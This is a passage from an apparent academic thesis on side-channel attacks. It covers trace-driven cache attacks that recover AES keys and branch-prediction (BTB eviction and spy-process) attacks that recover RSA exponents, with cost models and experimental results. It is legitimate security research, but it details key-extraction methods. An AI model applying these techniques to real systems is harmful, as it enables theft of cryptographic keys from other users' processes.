accesses in the last round are issued by the processor in a given order, i.e., first T4[I0 ], second T4[I1 ], etc. However, the actual order is implementation specific and may differ from our 99 assumption. Our attack can easily be adapted to any given order without any performance loss. We also need to mention that the S-box in AES implements a permutation, and therefore its inverse, i.e. Sbox−1 , exists. The outcomes of the last round accesses to T4 leak information about the values of the last round key bytes, i.e., RKi10 where i ∈ {0, .., 15}. For example, if the second access to T4 results in a cache hit, we can conclude that the indices I0 and I1 are equal. If it is a cache miss, then the inequality of these values becomes true. We can use this fact to find the correct round key bytes RK010 and RK110 as the following. We can write the value of Ii in terms of RKi10 and ci : Ii = Sbox−1 [ci ⊕ RKi10 ] , If I0 and I1 are equal, so are Sbox−1 [c0 ⊕ RK010 ] and Sbox−1 [c1 ⊕ RK110 ], which also mandates the equality of c0 ⊕ RK010 and c1 ⊕ RK110 . This equality can also be written as c0 ⊕ RK010 = c1 ⊕ RK110 ⇒ c0 ⊕ c1 = RK010 ⊕ RK110 Since the value of C is known to the attacker, RK010 ⊕RK110 can directly be computed from the values of c0 and c1 if the second access to T4 results in a cache hit. In case of a cache miss, we can replace the = sign in the above equations with 6= and we can use the inequalities to eliminate the values that cannot be the correct value of RK010 ⊕ RK110 . The value of RK210 relative to RK010 can also be determined by analyzing the first three accesses to T4 after the correct value of RK010 ⊕ RK110 is found. Similarly, if we extend our focus to the first four accesses, we can find RK310 . Then we can find RK410 and so on. 100 In general, we can find all of the round key byte differences RKi10 ⊕ RKj10 , where i, j ∈ {0, 1, ..., 15}. The value of any single byte RKi10 can be searched exhaustively to determine the entire round key. After revealing the entire round key, it becomes trivial to compute the actual secret key, because the key expansion of the AES cipher is a reversible function. 6.2.3. Complications in Reality and Actual Attack Scenarios In a real environment, even if the index of the second access to a certain lookup table is different than the index of the first access, a cache hit may still occur. Any cache miss results in the transfer of an entire cache line, not only one element, from the main memory. Therefore, if the former access retrieves an element, which lies in the same cache line of the previously accessed data, a cache hit will occur. Let δ be the number of bytes in a cache line and assume that each element of the table is k bytes long. Under this situation, there are δ/k elements in each line, which means any access to a specific element will map to the same line with (δ/k − 1) different other accesses. If two different accesses to the same array read the same cache line, the most significant parts of their indices, i.e., all of the bits except the last ` = log2 (δ/k) bits, must be identical. Using this fact, we can find the difference of the most significant part of the key bytes using the equation: hP0 i ⊕ hP4 i = hK0 i ⊕ hK4 i , where hAi stands for the most significant part of A. Therefore, we can only reveal hKi ⊕K4∗j+i i, where i,j ∈ {0,1,2,3}, using the collisions in the first round. Notice that (8 − `) is the size of the most significant 101 part of a table entry in terms of the number of bits, where ` = log2 (δ/k). First round attack allows us to reduce the search space by 12 ∗ (8 − `) bits. In theory ` can be as low as zero bits, in which case the search space becomes only 32 bits. The most common values of δ are 32 and 64 in widely used processors. For δ = 64 the search space is reduced by 48 bits yielding an 80 bit final search space. This is the reason why we need to consider the second round indices along with the first round to achieve full key disclosure. This complication does affect the last round attack too. We observe a cache hit in the second access to T4 whenever hS010 i = hS510 i , and so hSbox−1 [c0 ⊕ RK010 ]i = hSbox−1 [c1 ⊕ RK110 ]i . However due to the nonlinearity of the AES S-box, only the correct RK010 and RK110 values obey the above equation for every ciphertext sample. Therefore, we need to find the correct RK010 and RK110 values instead of their difference. This increases the search space of this initial guessing problem from 8 bits to 16 bits. However, once we find these round key bytes, we only need to search through 8 bits to find each of the remaining round key bytes. 6.2.4. Further Details of Our Attacks In this subsection we explain some details of our attacks that are not mentioned above. To be more precise, we explain the overall attack strategy and how to exploit second round accesses. We call all possible values that can be the correct value of a key byte (round key byte, respectively) as the hypothesis of that particular key byte (round key 102 byte, resp.) or shortly key byte hypothesis (round key byte hypothesis, resp.). Incorrect values are called wrong hypothesis. Initially all of the 256 values, i.e. from 0x00 to 0xff, are considered as the key byte hypothesis for a particular key byte. During the course of the attack, we distinguish some of these values as wrong key byte hypothesis; thus decrease the number of hypothesis and increase that of wrong hypothesis. In our attacks, we consider each access to a lookup table separately, starting from the second one. The first access is always a miss because of the cache cleaning and the assumptions explained above. We want to use the last round attack as an example to explain the overall attack strategy. Outcome of the second access to T4 allows us to eliminate the wrong key hypothesis for RK0 and RK1 . After we find the correct values for these bytes, we extend our attack considering the third access to find RK2 , then fourth access to find RK3 and so on. Therefore, there are different steps in the attack and each further step considers one more access than the number of accesses considered in the previous step. Each step has a different set of wrong key hypothesis. It decreases the overall attack cost if we eliminate as many wrong key hypothesis in a step as possible before proceeding with the next attack step. For example, the first step of the last round attack examines the outcomes of the first two accesses to T4 in each captured trace in the sample and eliminates all of the possible RK0 and RK1 values that are determined to be wrong. The second step considers the third access to T4 and the remaining hypothesis of RK0 and RK1 and eliminates all of the (RK0 , RK1 , RK2 ) triples that cannot generate the captured traces. The attack continues with the later steps and only those key hypothesis that can generate the captured traces remain at the end. If we can capture a large enough sample then we end up with only the correct key. If we 103 have less number of traces, then more than one hypothesis remain at the end of the attack and we need to have an exhaustive search on this reduced key set. Eliminating as many wrong key hypothesis as possible in earlier steps reduces the cost of the later ones and therefore the total cost of this attack. We eliminate all of the key hypothesis that do not obey the captured trace in each step. In this sense, our decision strategy is optimal, because it eliminates maximum possible number of hypothesis. The two round attack is slightly different than this scheme. There are four different lookup tables used in the first two rounds of AES. Therefore a single step of the two-round attack considers four more accesses than the previous step, i.e., the next unexamined access to each of the four tables. For example, the first step considers the first 8 accesses in the first round. These 8 accesses consist of two accesses to each of the four tables. The next step considers the first 12 accesses and so on. We also want to give more details of the two-round attack, especially the second round attack, in this subsection. Using the guesses from the first round, a similar guessing procedure can be derived in the second round in order to obtain further key bits. We describe a possible attack that uses only accesses to T1, i.e., the second table. Recall that AES implementation we work on uses 5 different tables with 256 entries in each. Let ∆i represent Pi ⊕ Ki . The index of the first access to T1 in the second round is: Sbox(∆4 ) ⊕ 2 • Sbox(∆9 ) ⊕ 3 • Sbox(∆14 ) ⊕ Sbox(∆3 ) ⊕ Sbox(K14 ) ⊕ K1 ⊕ K5 . Here Sbox(x) stands for the result of AES S-box lookup with the input value x and • is the finite field multiplication used in AES. 104 Using only the first 5 accesses to T1, i.e., up to fourth step of the two-round attack, and searching through K3 , K4 , K9 , and K14 , we can recover these four bytes. This guessing problem has a key space of 232 . Notice that we can already recover hK1 ⊕ K5 i in the first round attack. The indices of the first accesses to each of the lookup tables in the second round are functions of different key bytes and these functions span each of the 16 key bytes. Hence, we can recover the entire key by analyzing only the outcomes of the first 5 accesses to each of the four tables, i.e., a total of 20 accesses. Although knowing only the outcomes of the first 5 accesses is sufficient to recover the key, extending the attack by taking advantage of further accesses reduces the number of required traces. We want to mention that only the accesses of the first two rounds can be used in such a known-plaintext attack. The reason is the full avalanche effect. Starting from the third round, the indices become functions of the entire key, making an exhaustive search as efficient as our attack. 6.3. Analysis of the Attacks In this section we estimate the number of traces need to be capture to recover the secret key. In other words, we determine the cost of the attacks presented above. In the following subsections, we first present a computational model that allows us to determine the cost of trace-driven attacks and then we use this model to perform the cost analysis of the proposed attacks. The accuracy of our model has been verified experimentally. 105 6.3.1. Our Model Let m be 2(8−`) , i.e. the number of blocks in a table. A block of elements of a lookup table that are stored together in a single cache line is defined as a block of this table. The cost of a trace-driven attack is a function of m. The two most common values of m are 16 and 32 today and thus we evaluate the cost of the attacks for these two values of m. In order to calculate the expected number of traces, first we need to find an equation that gives us the expected number of table blocks that are loaded into the cache after the first k accesses. We denote this expected number as #k . The probability of being a single table block not loaded into the cache after )k . The expected number of blocks that are not k accesses to this table is ( m−1 m loaded becomes m ∗ ( m−1 )k . Therefore, m #k = m − m ∗ ( m−1 k ) . m k Let Rexpected be the expected fraction of the wrong key hypothesis that obeys the captured trace in k th step of the attack. In other words, a wrong key hypothesis that generated the same trace with the correct key in the first k accesses of an encryption has a chance of generating the captured outcome in the next step k with a probability of Rexpected . Therefore, if the adversary captures the outcomes of the first (k + 1) accesses (1 ≤ k ≤ 15) to T4 during a single encryption, he can k eliminate (1 − Rexpected ) fraction of the wrong key hypothesis in the k th step of the attack, where k Rexpected = #k #k #k #k ∗ + (1 − ) ∗ (1 − ) , 1 ≤ k ≤ 15 . m m m m k Notice that Rexpected is not the k th power of a constant Rexpected here, but it is defined as a variable that is specified by the parameter k. The left (right) side of 106 the above summation is the product of the probability of a cache hit (miss, resp.) and the expected ratio of the wrong hypothesis that remains after eliminating the ones that does not cause a hit (miss, resp.). k The following figure shows the approximations of Rexpected and #k for dif- ferent values of k and m. We want to mention again that these values are experimentally verified. The differences between the calculated and empirical values k are less than 0.2% in average. We can use these values to find the of Rexpected expected number of remaining wrong key hypothesis after t measurements or the expected number of measurements to reduce the key space down to a specific number or in any such calculations. 6.3.2. Trade-off Between Online and Offline Cost There is an obvious trade-off between online and offline cost of the attacks. If an adversary can capture a higher number of traces, it becomes easier to find the key. Eliminating more wrong hypothesis in early steps reduces the cost of the later steps. The change in the offline cost of the attacks with the number of captured traces can be seen in the following figures. As shown in Figure 4, the last round attack requires only 5 measurements to reduce the computational effort of breaking the entire 128-bit key below the recommended minimum security levels (c.f. [30]). NSA and NIST recommends a minimum key length of 80 bits for symmetric ciphers so that the computational effort of an exhaustive search should not be lower than 280 . 107 k m=32 Rexpected m=16 #k Rexpected #k 1 0.939453 1.000000 0.882813 1.000000 2 0.884523 1.968750 0.787140 1.937500 3 0.834806 2.907227 0.709919 2.816406 4 0.789923 3.816376 0.648487 3.640381 5 0.749522 4.697114 0.600528 4.412857 6 0.713273 5.550329 0.564035 5.137053 7 0.680868 6.376881 0.537265 5.815988 8 0.652021 7.177604 0.518709 6.452488 9 0.626464 7.953304 0.507063 7.049208 10 0.603946 8.704763 0.501197 7.608632 11 0.584236 9.432739 0.500138 8.133093 12 0.567116 10.137966 0.503050 8.624775 13 0.552384 10.821155 0.509209 9.085726 14 0.539850 11.482994 0.517999 9.517868 15 0.529340 12.124150 0.528890 9.923002 FIGURE 6.1. The calculated values of #k and Rexpected for different values of m. 108 m=16 m=32 Number of traces Cost ≈ Number of traces Cost ≈ 15 248.43 30 236.83 20 239.09 35 235.27 25 234.74 40 234.61 30 233.68 45 234.36 35 233.53 50 234.28 ≥40 < 233.50 ≥55 < 234.26 FIGURE 6.2. The cost analysis results of the two-round attack. m=16 m=32 Number of traces Cost ≈ Number of traces Cost ≈ 1 2117.68 1 2120.93 5 274.51 5 290.76 10 235.12 10 256.16 20 224.22 20 233.97 30 221.36 30 227.77 40 220.08 40 224.88 50 219.46 50 223.25 75 219.13 75 221.22 100 219.12 100 220.39 FIGURE 6.3. The cost analysis results of the last round attack. 109 6.4. Experimental Details We performed experiments to test the validity of the values we have presented above. The results show a very close correlation between our models and empirical results that confirms the validness of the models and calculations. Bertoni et al. showed that the cache traces could be captured by measuring power consumption [15]. In our experimental setup, we did not measure the power consumption, instead we assumed the correctness of their argument. We simply modified the AES source code of OpenSSL [71], which is arguably the most widely used open source cryptographic library. The purpose of our modifications was not to alter the execution flow of the cipher, but to store the values of the access indices. These index values were then used to generate the cache traces. This process allowes us to capture the traces and obtain the empirical results. The average difference between the empirical and calculated k values of Rexpected , i.e, the error rate, is less than 0.2%. We believe this shows enough accuracy to validate our model. We generated one million randomly chosen cipherkeys and encrypted 100 random plaintext under each of these keys. In other words, we performed the last round attack steps with 100 random plaintext. After each encryption, we determined the ratio of the number of remaining wrong key hypothesis to the number of wrong key hypothesis that were present before the encryption. We call k this ratio the reduction ratio, which is denoted as Rexpected . We calculated the average of these measured values. Our results show very close correlation between k the measured and calculated values. The calculated Rexpected values are given in Subsection 6.3.1. 110 6.5. Conclusion We have presented trace-driven cache attacks on the most widely used software implementation of AES cryptosystem. We have also developed a mathematical model, accuracy of which is experimentally verified, to evaluate the cost of the proposed attacks. We have analyzed the cost using two different metrics, each of which represents the cost of a different phase of the attack. Our analysis shows that such trace-driven attacks are very efficient and require very low number of encryptions to reveal the secret key of the cipher. To be more specific, an adversary can reduce the strength of 128-bit AES cipher below the recommended minimum security level by capturing the traces of only 5 encrpytions. Having more traces reduces the total cost of the attack significantly. Our results also show this trade-off between the online and offline cost of the attack in detail. 111 7. PREDICTING SECRET KEYS VIA BRANCH PREDICTION The contradictory requirement of increased clock-speed with decreased power-consumption for today’s computer architectures makes branch predictors an inevitable central CPU ingredient, which significantly determines the so called Performance per Watt measure of a high-end CPU, c.f. [41]. Thus, it is not surprising that there has been a vibrant and very practical research on more and more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately, the present document identifies branch prediction even in the presence of recent security promises for commodity platforms from the Trusted Computing area as a novel and unforeseen security risk. Indeed, although even the most recently found security risks for x86-based CPU’s have been implicitly pointed out in the old but thorough x86-architecture security analysis, c.f. [95], we have not been able to find any hint in the literature spotting branch prediction as an obvious side channel attack victim. Let us elaborate a little bit on this connection between side-channel attacks and modern computer-architecture ingredients. So far, typical targets of side-channel attacks have been mainly Smart Cards, c.f. [28, 59]. This is due to the ease of applying such attacks to smart cards. The measurements of side-channel information on smart cards are almost “noiseless”, which makes such attacks very practical. On the other side, there are many factors that affect such measurements on real commodity computer systems based upon the most successful one, the Intel x86-architecture, c.f. [91]. These factors create noise, and therefore it is much more difficult to develop and perform successful attacks on such “real” computers within our daily life. Thus, until very recently, the vulnerability of systems even running on servers was not “really” 112 considered to be harmful by such side-channel attacks. This was changed with the work of Brumley and Boneh, c.f. [21] and Chapter3, who demonstrated a remote timing attack over a real local network. They simply adapted the attack principle as introduced in [85] to show that the RSA implementation of OpenSSL [71] — the most widely used open source crypto library — was not immune to such attacks. Even more recently, we have seen an increased research effort on the security analysis of the daily life PC platforms from the side-channel point of view. Here, it has been especially shown that the cache architecture of modern CPU’s creates a significant security risk, (c.f. [5, 14, 72, 73, 80] and Chapters 4, 5, and 6) which comes in different forms. Although the cache itself has been known for a long time being a crucial security risk of modern CPU’s, c.f. [95, 48], the above papers were the first proving such vulnerabilities practically and raised large public interest in such vulnerabilities. Especially in the light of ongoing Trusted Computing efforts, cf. [99], which promise to turn the commodity PC platform into a trustworthy platform, cf. also [25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC platforms are of particular interest. This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far. Even more interesting is the fact that all of the above pure software side channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remote), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side channel attacks render all of the sophisticated protection mechanisms as for e.g. described in [42, 103] as useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks 113 simply exploit deeper processor ingredients — i.e., below the trust architecture boundary, cf. [81, 42]. Having said all this, it is natural to identify other modern computer architecture ingredients, which have not yet been discovered as a security risk and which are operating below the current trust architecture boundaries. That is the focus of the present and the next chapters — a processor’s Branch Prediction Unit (BPU). More precisely, we analyze BPUs and highlight the security vulnerabilities associated with their opaque operations deep inside a processor. In other words, we present so called branch prediction attacks on simple RSA implementations as a case study to describe the basics of the novel attacks an adversary can use to compromise the security of a platform. Our attacks can also be adapted to other RSA implementations and/or other public-key systems like ECC. We try to refer to specific vulnerable implementations throughout this text. 7.1. Outlines of Various Attack Principles We gradually develop 4 different attack principles in this section. Although we describe these attacks on a simple RSA implementation, the underlying ideas can be used to develop similar attacks on different implementations of RSA and/or on other ciphers based upon ECC. In order to do so, we assume that an adversary knows every detail of the BPU architecture as well as the implementation details of the cipher (Kerckhoffs’ Principle). This is indeed a valid assumption as the BPU details can be extracted using some simple benchmarks like the ones given in [65]. 114 7.1.1. Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack) In this attack, we rely on the fact that the prediction algorithms are deterministic, i.e., the prediction algorithms are predictable. We present a simple attack below, which demonstrates the basic idea behind this attack. The presented attack is a modified version of Dhem et al.’s attack [34]. Assume that the RSA implementation employs Square-and-Multiply exponentiation and Montgomery Multiplication. Assume also that an adversary knows the first i bits of d and is trying to reveal di . For any message m, he can simulate the first i steps of the operation and obtain the intermediate result that will be the input of the (i + 1)th squaring. Then, the attacker creates 4 different sets M1 , M2 , M3 , and M4 , where M1 = {m | m causes a misprediction during MM of (i + 1)th squaring if di = 1} M2 = {m | m does not cause a misprediction during MM of (i + 1)th squaring if di = 1} M3 = {m | m causes a misprediction during MM of (i + 1)th squaring if di = 0} M4 = {m | m does not cause a misprediction during MM of (i + 1)th squaring if di = 0}, and MM means Montgomery Multiplication. If the difference between timing characteristics, e.g., average execution time, of M1 and M2 is more significant than that of M3 and M4 , then he guesses that di = 1. Otherwise di is guessed to be 0. To express the above idea more mathematically, we define: • An Assumption Ait : di = t , where t ∈ {0, 1}. • A Predicate P : (m) → {0, 1} with P(m) = 1 if a misprediction occurs during the computation of m2 (modN ) 0 otherwise. 115 • An Oracle Ot : (m, i) → {0, 1} under the assumption Ait : Ot (m, i) = 1 P(mtemp ) = 1 0 P(mtemp ) = 0, where mtemp = m(d0 ,d1 ,...di−1 ,t)2 (modN ). • A Separation Sit under the assumption Ait : (S0 , S1 ) = ({m|Ot (m, i) = 0}, {m|Ot (m, i) = 1}). For each bit of d, starting from d1 , the adversary performs two partitionings based on the assumptions Ai0 and Ai1 , where di is the next unknown bit that he wants to predict. He partitions the entire sample into two different sets. Each assumption and each plaintext, M , in one of these sets yields the same result for Ot (M, i). We call these partitioning separations Si0 and Si1 . Depending on the actual value of di , one of the assumptions Ai0 and Ai1 will be correct. We define the separation under the correct assumption as “Correct Separation” and the other as “Random Separation”. To be more precise, we define the Correct Separation CSi as CSi = Sit = (CS0i , CS1i ) = ({M |Ot (M, i) = 0}, {M|Ot (M, i) = 1}), and the Random Separation RSi as RSi = Si1−t = (RS0i , RS1i ) = ({M |O1−t (M, i) = 0}, {M|O1−t (M, i) = 1}), where di = t. The decryption of each plaintext in CS1i encounters a misprediction delay during the ith squaring, whereas none of the plaintext in CS0i results in a misprediction during the same computation. Therefore, the adversary will realize 116 a significant timing difference between these two sets and he can predict the value of di . On the other hand, the occurrences of the mispredictions will be randomlike for the sets RS0i and RS1i , which is the reason why we call it a random separation. We can define a correct decision as taking that decision di = t, where Ot (M, i) = P(M(d0 ,d1 ,...di )2 (modN), i) for each possible M . This attack requires the knowledge of the BPU state just before the decryption, since this state, as well as the execution of the cipher, determines the prediction of the target branch. This information is not readily available to an adversary. However, he can perform the analysis phase assuming each possible state one at a time. One expects that only under the assumption of the correct state the above separations should yield a significant difference. Yet, a better approach is to set the BPU state manually. If the adversary has access to the machine the cipher is running on, he can execute a process to reset the BPU state or to set it to a desired state. Indeed, this is the strategy we follow in our other attacks. This type of attacks can be applied on any platform as long as a deterministic branch prediction algorithm is used on it. To break a cipher using this kind of attack, we need to have a target branch, outcome of which must depend on the secret/private key of the cipher, a known nonconstant value like the plaintext or the ciphertext, and (possibly) some unknown values that can be searched exhaustively in a reasonable amount of time. 7.1.1.1. Examples of vulnerable systems. RSA with MM and without CRT (Chinese Remainder Theorem) are susceptible to this kind of attack. The conditional branch of the extra reduction step can be used as the target branch. We have already showed the attack on 117 S&M exponentiation. It can be adapted to b-ary and sliding windows exponentiation, c.f. [64] and Section 2.1.2, too. In these cases, the adversary needs to search each window value exhaustively and construct the partitions for each of these candidate window values. He encounters the correct separation only for the correct candidate and therefore can realize the correct value of the windows. If CRT is employed in the RSA implementation, we cannot apply this attack. The reason is that the outcome of the target branch will also depend on the values of p and q, which are not feasible to be searched exhaustively. Similarly, if the RSA implementation does not have a branch that is taken or not taken depending on a known nonconstant value (e.g. extra reduction step in Montgomery Multiplication, which is input dependent to be performed), we cannot use this approach to find the secret key. For example, the if statement in S&M exponentiation (c.f. Line 4 in Fig. 2.1) as our target branch is not vulnerable to this attack. This is due to the fact that the mispredictions will occur in exactly the same steps of the exponentiation regardless of the input values, and one set in each of the two separations will always be empty. 7.1.2. Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack) In this attack, we assume that the cipher runs on a simultaneous multithreading (SMT) machine, c.f. [92], and the adversary can run a dummy process simultaneously with the cipher process. In such a case, he can clear the BTB via the operations of the dummy process and causes a BTB miss during the execution of the target branch. The BPU automatically predicts the branch as not to be taken if it misses the target address in the BTB. Therefore, there will be a misprediction whenever the actual outcome of the target branch is ‘taken’. We 118 stress that the two parallel threads are isolated and share only the common BPU resource, c.f. [92, 91, 73, 80]. Borrowed from [73], we name this kind of attack an Asynchronous Attack, as the adversary-process needs no synchronization with the simultaneous crypto process. Here, an adversary also does not need to know any details of the prediction algorithm. He can simulate the exponentiations as done in the previous attack and can partition the sample based on the “actual” outcome of the branch. In other words, the following predicate in the oracle (c.f. Section 7.1.1) can be used: 1 if the target branch is taken during the computation of m2 (modN ) P(m) = 0 otherwise. The adversary does not have to clear the entire BTB, but only the BTB set that stores the target address of the branch under consideration, i.e., the target branch. We define three different ways to achieve this: • Total Eviction Method: the adversary clears the entire BTB continuously. • Partial Eviction Method: the adversary clears only a part of the BTB continuously. The BTB set that stores the target address of the target branch has to be in this part. • Single Eviction Method: the adversary continuously clears only the single BTB set that stores the target address of the target branch. The easiest method to apply is clearly the first one, because an adversary does not have to know the specific address of the target branch. Recall that the set of the BTB to store the target address of a branch is determined by the actual logical address of that branch. The resolution of clearing the BTB plays a crucial role in the performance of the attack. We have assumed so far that it was 119 possible to clear the entire BTB between two consecutive squaring operations of an exponentiation. However, in practice this is not (always) the case. Clearing the entire BTB may take more time than it takes to perform the operations between two consecutive squarings. Although, this does not nullify the attack, it will mandate (most likely) a larger sample size. Therefore, if an adversary can apply one of the last two eviction methods, he can improve the performance of the attack. We want to mention that, from the cryptographic point of view, we can assume that an adversary knows the actual address of any branch in the implementation due to Kerckhoff’s Principle. Under this assumption, the adversary can apply the single eviction method and achieve a very low resolution, which enables him to cause a BTB miss each time the target branch is executed. Recall also that there is no complicated synchronization between crypto and adversary process needed. 7.1.2.1. Examples of vulnerable systems. The same systems vulnerable to the first attack (c.f. Section 7.1.1) are also vulnerable to this kind of attack. The main difference of this attack compared to the first one is the ease of applying it, i.e., unnecessity of knowing = reverseengineering the subtle BPU details, yielding the correct BPU states for specific time points. 7.1.3. Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack) In the previous attack, we have specifically excluded the synchronization issue. However, if the adversary finds a way to establish a synchronization with the cipher process, i.e., he can determine for (e.g.) the ith step of the exponentiation 120 and can clear the BTB just before the ith step, then he can introduce misprediction delays at certain points during the computation. Borrowed again from [73], we named this kind of attack a Synchronous Attack, as the adversary-process needs some kind of synchronization with the simultaneous crypto process. Assume that the RSA implementation employs S&M exponentiation and the if statement in S&M exponentiation (c.f. Line 4 in Figure 2.1) is used as the target branch. As stated above, the previous attacks cannot break this system if only the mentioned conditional branch is examined. However, if the adversary can clear the BTB set of the target branch (c.f. Single Eviction Method in Section 7.1.2) just before the ith step, he can directly determine the value of di in the following way. The adversary runs RSA for a known plaintext and measures the execution time. Then he runs it again for the same input but this time he clears the single BTB set during the decryption just before the ith execution of the conditional branch under examination, i.e., the if statement of Line 4 in Fig. 2.1. This conditional branch is taken or not taken depending only on the value of di . If it turns out to be taken, the second decryption will take longer time than the first execution because of the misprediction delay. Therefore, the adversary can easily determine the value of this bit by successively analyzing the execution time. 7.1.3.1. Examples of vulnerable systems. Any implementation of a cryptosystem is vulnerable to this kind of attack if the execution flow is “key-dependent”. The exponents of RSA with S&M exponentiation can be directly obtained even if the CRT is used. If RSA employs sliding window exponentiation, then we can find a significant number of bits (but not all) of the exponents. However, if b-ary method is employed, then only 1 over 121 2wsize of the exponent bits can be discovered, where wsize is the size of the window. This attack can even break such prominent and efficient implementations that had been considered to be immune to certain kinds of side-channel attacks, c.f. [52, 105]. 7.1.4. Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack) In the previous three attacks, we have considered analyzing the execution time of the cipher. In this attack, we will follow a different approach. Again, assume that an adversary can run a spy process simultaneously with the cipher. This spy process continuously executes branches and all of these branches map to the same BTB set with the conditional branch under attack. In other words, there is a conditional branch (under attack) in the cipher, which processes the exponent and executes the corresponding sequence of operations. Moreover, assume also that the branches in the spy process and the cipher process can only be stored in the same BTB set. Recall that it is easy to understand the properties of the BTB using simple benchmarks as explained in [65]. The adversary starts the spy process before the cipher, so when the cipher starts decryption/signing, the CPU cannot find the target address of the target branch in BTB and the prediction must be not-taken, c.f. [92]. If the branch turns out to be taken, then a misprediction will occur and the target address of the branch needs to be stored in BTB. Then, one of the spy branches has to be evicted from the BTB so that the new target address can be stored in. When the spyprocess re-executes its branches, it will encounter a misprediction on the branch that has just been evicted. If the spy-process also measures the execution time of its branches (altogether), then it can detect whenever the cipher modifies the 122 BTB, meaning that the execution time of these spy branches takes a little longer than usual. Thus, the adversary can simply determine the complete execution flow of the cipher process by continuously performing the same operations, i.e., just executing spy branches and measuring the execution time. He will see the prediction/misprediction trace of the target branch, and so he can determine the execution flow. We named this kind of attack an Asynchronous Attack, as the adversary-process needs no synchronization at all with the simultaneous crypto process — it is just following the paradigm: continuously execute spy branches and measure their execution time. 7.1.4.1. Examples of vulnerable systems. Any implementation that is vulnerable to the previous attack is also vulnerable to this one. Specifically any implementation of a cryptosystem is vulnerable to this kind of attack if the execution flow is “key-dependent”. This attack, on the other hand, is very easy to apply, because the adversary does not have to solve the synchronization problem at all. Considering all these aspects of the current attack, we can confidently say that it is a powerful and practical attack, which puts many of the current public-key implementations in danger. 7.2. Practical Results We also performed practical experiments to validate the aforementioned attacks which exploit the branch predictor behavior of modern microprocessors. Obviously, eviction-driven attacks using simultaneous multithreading are more general, and demand nearly no knowledge about the underlying BPU — compared to the other type of branch prediction attacks from above. Thus, we have chosen 123 to carry out our experimental attacks in a popular simultaneous multithreading environment, cf. [91]. In this setting, an adversary can apply this kind of attacks without any knowledge on the details of the used branch prediction algorithm and BTB structure. Therefore we decided to implement our two asynchronous attacks and show their results as a “proof-of-concept”. 7.2.1. Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack) In this kind of attack we have chosen, for reasons of simplicity and practical significance, to implement the single and total eviction methods. We used a dummy process that continuously evicts BTB entries by executing branches. This process was simultaneously running with RSA on an SMT platform. It executed a large number of branches and evicted each single BTB entry one at a time. This method requires almost no information on the BTB structure. We performed this attack on a very simple RSA implementation that employed square-andmultiply exponentiation and Montgomery multiplication with dummy reduction. We used the RSA implementation in OpenSSL version 0.9.7e as a template and made some modifications to convert this implementation into the simple one as stated above. To be more precise, we changed the window size from 5 to 1, turned blinding off, removed the CRT mode, and added the dummy reduction step. The experiments were run under the configuration shown in Table 7.1. We used random plaintexts generated by the rand() and srand() functions available in the standard C library. The current time was fed into srand() function as the pseudorandom number generation seed. We measured the execution time in terms of clock cycles using the cycle counter instruction RDTSC, which is available in user-level. 124 Operating System: RedHat workstation 3 Compiler: gcc version 3.2.3 Cryptographic Library: OpenSSL 0.9.7e TABLE 7.1. The configuration used in the experiments We generated 10 million random single-block messages and measured their decryption times under a fixed 512-bit randomly generated key. In our analysis phase, we eliminated the outliers and used only 9 million of these measurements. We then processed each of these plaintext and divided them into the sets as explained in Section 7.1.1 and Section 7.1.2 based on the assumption of the next unknown bit and the assumed outcome of the target branch. Hereafter we calculated the difference of the average execution time of the corresponding sets for each bit of the key except the first two bits. The mean and the standard deviation of these differences for correct and random separations of total eviction method are given in the following Figure 7.1. This figure shows also on the right side, the raw timing differences after averaging the 9 million measurements into one single timing difference, where a single dot corresponds to the timing difference of a specific exponent bit, i.e., the x-axis corresponds to the exponent bits from 2 to 511. Using the values in Figure 7.1, we can calculate the probability of successful prediction of any single key bit. We interpret the measured average execution time differences for correct and random separation as realizations of normally (Gaussian) distributed random variables, denoted by Y and X respectively. We 2 may assume Y ∼ N (µY , σY2 ) and X ∼ N (µX , σX ) for each bit of any possible 125 . FIGURE 7.1. Practical results when using the total eviction method in attack principle 2. 126 key, where µY = 58.91, µX = 1.24, σY = 62.58, and σX = 34.78, c.f. Figure 7.1. We then introduce the normally distributed random variable Z as the difference between realizations of X and Y , i.e., Z = Y − X and Z ∼ N (µZ , σZ2 ). The mean and deviation of Z can be calculated from those of X and Y as µZ = µY − µX = 58.91 − 1.24 = 57.67 q p 2 = (62.58)2 + (34.78)2 = 71.60 σZ = σY2 + σX As our decision strategy is to pick that assumption of the bit value that yields the highest execution time difference between the sets we constructed under that assumption, our decision will be correct whenever Z > 0. The probability for this realization, Pr[Z > 0], can be determined by using the z-distribution table, i.e., Pr[Z > 0] = Φ((0 − µZ )/(σZ )) = Φ(−0.805) = 0.79, which shows that our decisions will be correct with probability 0.79 if we use N = 10 million samples. Although we could increase this accuracy by increasing the sample size, this is not necessary. If we have a wrong decision for a bit, both of the separations will be random-like afterwards and we will only encounter relatively insignificant differences between the separations. Therefore, it is possible to detect an error and recover from a wrong decision without necessarily increasing the sample size. Similarly, Figure 7.2 shows single eviction method results. Since the resolution is much higher in single eviction method, as an expected consequence, it is much efficient than the total eviction method. A similar calculation as above points a success rate of 89%. 127 . FIGURE 7.2. Practical results when using the single eviction method in attack principle 2. 7.2.2. Results for Attack 4 = Trace-driven Attack against the BTB (Asynchronous Attack) To practically test attack 4, which is also an asynchronous attack, we used a very similar experimental setup that is described above. But, instead of a dummy process that blindly evicts the BTB entries, we used a real spy function. The spy-process evicted the BTB entries by executing branches just like the dummy process. Additionally, it also measured the execution time of these branches. More precisely, it only evicted the entries in the BTB-set that contains the target address of the RSA branch under attack and reported the timing measurements. In this experiment, we examined the execution of the conditional branch in the exponentiation routine and not the extra reduction steps of Montgomery Multiplication. 128 We implemented the spy function in such a way that it only checks the BTB at the beginning or early stages of each montgomery multiplication. Thus, we get exactly one timing measurement per montgomery operation, i.e., multiplication or squaring. Therefore, we could achieve a relatively “clean” measurement procedure. We ran our spy and the cipher process N many times, where N is the sample size. Then we averaged the timing results taken from our spy to decrease the noise amplitude in the measurements. The resulting graph shown in Figure 7.3 presents our first results for different values of N — clearly visualizing the difference between squaring and 